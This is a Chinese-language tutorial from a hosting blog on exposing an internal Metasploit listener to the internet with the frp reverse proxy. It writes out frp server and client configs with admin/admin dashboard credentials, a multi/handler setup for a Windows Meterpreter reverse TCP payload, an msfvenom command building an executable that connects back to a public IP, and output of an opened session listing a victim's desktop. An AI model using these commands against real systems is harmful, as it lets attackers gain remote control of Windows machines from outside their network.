您好,登錄后才能下訂單哦!
這篇文章主要講解了“內網Metasploit映射到外網的方法是什么”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“內網Metasploit映射到外網的方法是什么”吧!
下載frp
找到最新的releases下載,系統版本自行確認。
下載方法:
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz tar zxvf frp_0.16.1_linux_amd64.tar.gz cd frp_0.16.1_linux_amd64
公網服務器配置:
修改配置文件:
[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ vim frps.ini [common] bind_port = 7000 dashboard_port = 7500 dashboard_user = admin dashboard_pwd = admin
啟動服務:
[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ nohup ./frps -c frps.ini > log.txt &
kali linux 配置:
修改配置文件:
kali@kali:~/frp_0.16.1_linux_amd64$ vim frpc.ini [common] server_addr = xx.xx.xx.xx server_port = 7000 [msf] type = tcp local_ip = 127.0.0.1 local_port = 6666 remote_port = 4446
啟動服務:
kali@kali:~/frp_0.16.1_linux_amd64$ nohup ./frpc -c frpc.ini > log.txt &
metasploit配置:
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 127.0.0.1 lhost => 127.0.0.1 msf5 exploit(multi/handler) > set lport 6666 lport => 6666
生成payload文件:
e2a5e@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=34.80.29.48 lport=4446 -f exe -o test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: test.exe
執行payload文件,測試效果:
msf5 exploit(multi/handler) > exploit [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? [*] Started reverse TCP handler on 127.0.0.1:6666 [*] Sending stage (206403 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:6666 -> 127.0.0.1:35992) at 2019-09-03 17:05:39 +0800 meterpreter > ls Listing: C:\Users\win7\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 2309 fil 2019-08-30 11:12:41 +0800 Google Chrome.lnk 100777/rwxrwxrwx 10916080 fil 2019-08-30 11:57:01 +0800 PCHunter64.exe 40777/rwxrwxrwx 0 dir 2019-09-03 16:12:02 +0800 PanDownload 100666/rw-rw-rw- 282 fil 2018-09-11 09:18:55 +0800 desktop.ini 100777/rwxrwxrwx 7168 fil 2019-09-03 16:39:18 +0800 test.exe meterpreter >
感謝各位的閱讀,以上就是“內網Metasploit映射到外網的方法是什么”的內容了,經過本文的學習后,相信大家對內網Metasploit映射到外網的方法是什么這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。